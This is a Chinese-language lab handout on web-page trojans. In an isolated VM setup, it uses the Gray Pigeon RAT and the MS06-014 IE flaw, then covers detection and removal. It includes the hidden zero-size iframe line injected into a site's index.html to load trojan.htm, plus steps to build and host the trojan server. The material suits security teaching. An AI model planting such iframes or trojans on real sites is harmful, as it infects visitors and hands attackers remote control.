网页挂马原理
网页木马
一、实验目的
1.理解网页木马的工作原理
2.熟悉木马的植入过程
3.学会利用网页木马脚本
二、实验环境
1.系统环境:Windows环境, XP环境
2.软件工具:灰鸽子
三、实验原理
网页木马原理及相关定义
浏览器是用来解释和显示万维网文档的程序,已经成为用户上网时必不可少的工具之一。“网页木马”由其植入方式而得名,是通过浏览网页的方式植入到被控制主机上,并对被控制主机进行控制木马。与其它网页不同,木马网页是黑客精心制作的,用户一旦访问了该网页就会中木马。其中原理是:因为嵌入在这个网页中的脚本利用了IE浏览器的漏洞,让IE在后台自动下载黑客放置在网络上的木马并运行(安装)这个木马,也就是说这个网页能下载木马到本地并运行(安装)下载本地电脑上的木马,整个过程都在后台运行,用户一旦打开这个网页,下载过程和运行(安装)过程就自动开始了。
如果打开一个网页,IE浏览器真的能自动下载程序并运行程序吗?如果IE真的能肆无忌惮地任意下载和运行程序,那么用户将会面临巨大的威胁。实际上,为了安全IE浏览器是禁止自动下载程序特别是运行程序的,但是IE浏览器存在着一些已知和未知的漏洞网页木马就是利用这些漏洞获得权限来下载程序和运行程序的。
利用Microsoft的MS06014漏洞,完成网页木马的植入。
四、实验步骤
生成网页木马与挂马过程:
打开window7虚拟机,打开实验程序中H-Clinet.exe灰鸽子程序。单击配置服务程序按钮,在文本框中输入本机IP地址,选择路径保存在C:\Apache2.2\htdocs文件夹中,单击生成服务器按钮,在htdocs文件夹中生成木马程序Server-Setup.exe,如下图所示:
利用网页木马脚本,用记事本打开guama-实验程序文件夹-trojan.htm文件,修改其源代码中的IP地址为Windows7的IP地址:192.168.70.133,,如下图所示:
然后将修改后的trojan.htm脚本文件保存到C:\Apache2.2\htdocs目录下,C:\Apache2.2\htdocs目录为木马网站的网站空间目录,如下图所示:
对默认网站进行挂马,进入C:\Apache\htdocs目录。使用记事本打开index.html文件,加入一行代码:<iframe src=’’trojan.htm’’ name=’’jlcss’’ windth=0 height=0 frameborder=0>,如下图所示:
开启Apache,如下图所示:
开始木马的植入,打开XP虚拟机,打开IE浏览器访问//192.168.70.133,如下图所示:
返回Windows7虚拟机中,灰鸽子软件界面“自动上线主机”中显示有主机上线,木马植入成功!如下图所示:
在XP虚拟机中,打开C:\WINDIWS文件目录,会发现生成了可执行文件Hacker.com.cn.exe,如下图所示:
右击我的电脑-管理-服务,观察到木马安装时自动生成系统服务GrayPigeon_Hacker.com.cn.exe已经启动。GrayPigeon_Hacker.com.cn.exe的可执行文件路径:“C:\WINDWOS\Hacker.com.cn.exe”可以看出灰鸽子是通过此系统服务执行Hacker.com.cn.exe文件来自启动木马服务器,如下图所示:
灰鸽子木马服务器安装完成后就会立刻连接网络寻找其客户端,并与其建立连接。这时木马程序会将自己的进程命名为IEXPLORE.EXE,打开命令行窗口,输入netstat -ano查看每个网络连接的进程ID,再打开任务管理器,发现端口为8000的TCP连接的进程ID刚好为木马伪装的程序IEXPLORE.EXE的进程ID,如下图所示:
木马的删除:
自动删除,通过使用“灰鸽子远程控制”程序卸载木马的“服务器”程序。具体做法:选择上线主机,单击“远程控制命令”属性页,单击界面右侧的“卸载服务端”按钮,卸载木马的“服务器”程序,如下图所示:
手动删除:
(1) 打开XP虚拟机,启动IE浏览器,单击菜单栏-工具-Internet选项,弹出Internet选项配置对话框,单击“删除文件”按钮,在弹出的“删除文件”对话框中,选择“删除所有脱机内容”复选框,单击“确定”按钮直到完成
(2) 双击“我的电脑”,在浏览器中单击“工具”-“文件夹选项”菜单项,单击“查看”属性页,选中“显示所有文件和文件夹”,并将“隐藏收保护的操作系统文件”复选框置为不选中状态,单击“确定”按钮
(3) 关闭已打开的web页面,启动“windows”任务管理器,单击“进程”属性页,在“印象名称”中选中所有“IEXPLORE.EXE”进程,单击“结束进程”按钮
(4) 删除“C:\WINDOWS\Hacker.com.cn.exe”文件
(5) 启动“服务”管理器,选中右侧详细列表中的“GrayPigeon_Hacker.com.cn”,单击右键,在弹出菜单选中“属性”菜单项,在弹出的对话框中,将“启动类型”改为“禁用”,单击“确定”按钮
(6) 启动注册表编辑器,删除HKEY_LOCAL_MACHINE\SYSTEM\CurrentContronlSet\Service\GrayPigeon_Hacker.com.cn节点
(7) 重新启动计算机
(8) 打开灰鸽子程序,查看自动上线主机,已经不存在了
